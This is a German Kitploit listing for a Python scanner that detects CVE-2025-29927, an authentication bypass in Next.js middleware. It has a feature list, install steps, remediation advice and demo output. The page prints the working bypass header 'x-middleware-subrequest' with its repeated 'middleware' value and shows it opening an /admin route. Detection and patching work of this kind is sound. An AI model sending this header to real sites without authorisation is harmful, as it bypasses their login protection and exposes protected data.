Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29927 — 🔐 Python-basierter intelligenter Scanner für CVE-2025-29927 — Next.js-Middleware-Authentifizierungsumgehungs-Schwachstelle. Erkennt Meta-Refresh, keyword-basierte Weiterleitungen und mehr. | Kitploit
Tools/GitHubGitHub/sagsooz/cve-2025-29927
SchwachstellenscannerWebanwendungs-ExploitationWebsicherheitPenetrationstestsAuthentifizierungLernen & Bildung
GitHubsagsooz/cve-2025-29927

CVE-2025-29927

🔐 Python-basierter intelligenter Scanner für CVE-2025-29927 — Next.js-Middleware-Authentifizierungsumgehungs-Schwachstelle. Erkennt Meta-Refresh, keyword-basierte Weiterleitungen und mehr.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔍 CVE-2025-29927 - Next.js Middleware-Bypass-Erkennung

Dieser Python-basierte intelligente Scanner hilft, die CVE-2025-29927-Sicherheitslücke in Next.js-Anwendungen zu erkennen – einen kritischen Middleware-Bypass, der Angreifern ermöglicht, die Authentifizierung mithilfe eines manipulierten HTTP-Headers zu umgehen.

🧠 Das Tool erkennt nicht nur HTTP-Weiterleitungen, sondern auch clientseitige Weiterleitungsmechanismen wie <meta http-equiv="refresh">, schlüsselwortbasierte Login-Weiterleitungen und stille Authentifizierungsumgehungen.


🚀 Funktionen

  • ✅ Interaktive Eingabe (Ziel-URL und Pfad)
  • ✅ Intelligente Erkennung von:
    • x-middleware-subrequest Bypass-Header
    • <meta refresh>-basierte Weiterleitungen
    • HTML-Inhalt mit Schlüsselwörtern wie login, sign in, authentication
  • ✅ Farbcodierte CLI-Ausgabe:
    • 🟩 Grün für 2xx-Antworten
    • 🟨 Gelb für 3xx
    • 🟥 Rot für 4xx/5xx
  • ✅ Vorzeitiger Ausstieg, wenn der Bypass erfolgreich ist
  • ✅ Einfach zu erweitern und anzupassen

  • 📸 Demo

    root@kitploit:~
    $ python3 CVE-2025-29927.py
    
    🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
    📁 Enter the protected path (e.g. /dashboard): /admin
    
    → Testing with header: middleware:middleware:middleware:middleware:middleware
       ↳ HTTP Status: 200
       ↳ Redirect detected: No
    
    ✅ VULNERABLE! Bypass successful with header:
       x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    🧑‍💻 Verwendung

    1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/sagsooz/CVE-2025-29927.git
    cd CVE-2025-29927
    

    2. Abhängigkeiten installieren:

    root@kitploit:~
    pip install -r requirements.txt
    

    3. Skript ausführen:

    root@kitploit:~
    python3 CVE-2025-29927.py
    

    📂 Projektstruktur

    root@kitploit:~
    .
    ├── CVE-2025-29927.py   # Main interactive scanner
    ├── requirements.txt            # Python dependencies
    └── README.md                   # This file
    

    📦 requirements.txt

    root@kitploit:~
    requests
    beautifulsoup4
    colorama
    

    🛡️ Behebung

    Wenn Ihre App betroffen ist, gehen Sie wie folgt vor:

    1. Aktualisieren Sie Next.js auf v15.2.3 oder neuer (bzw. 14.2.25+ / 13.5.7+)
    2. Härten Sie das Middleware-Routing und verlassen Sie sich nicht ausschließlich auf die Middleware zur Authentifizierung.
    3. Entfernen Sie den x-middleware-subrequest-Header am Edge (z. B. Nginx):
    root@kitploit:~
    proxy_set_header x-middleware-subrequest "";
    

    ℹ️ Über die Sicherheitslücke

    CVE-2025-29927 ermöglicht Angreifern, Next.js-Middleware-Prüfungen zu umgehen, indem sie den x-middleware-subrequest-Header mit manipulierten Werten wie folgt manipulieren:

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    In anfälligen Versionen wird dadurch die Middleware-Ausführung vollständig deaktiviert – was direkten Zugriff auf geschützte Routen wie /dashboard, /admin usw. ermöglicht.


    📬 Kontakt

    Gepflegt von: @mrzblackhat
    Kontaktieren Sie mich gerne auf Telegram für Vorschläge, Verbesserungen oder Beiträge.


    🏷 Tags

    next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking


    📄 Lizenz

    Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie es verantwortungsbewusst.

    Tool herunterladen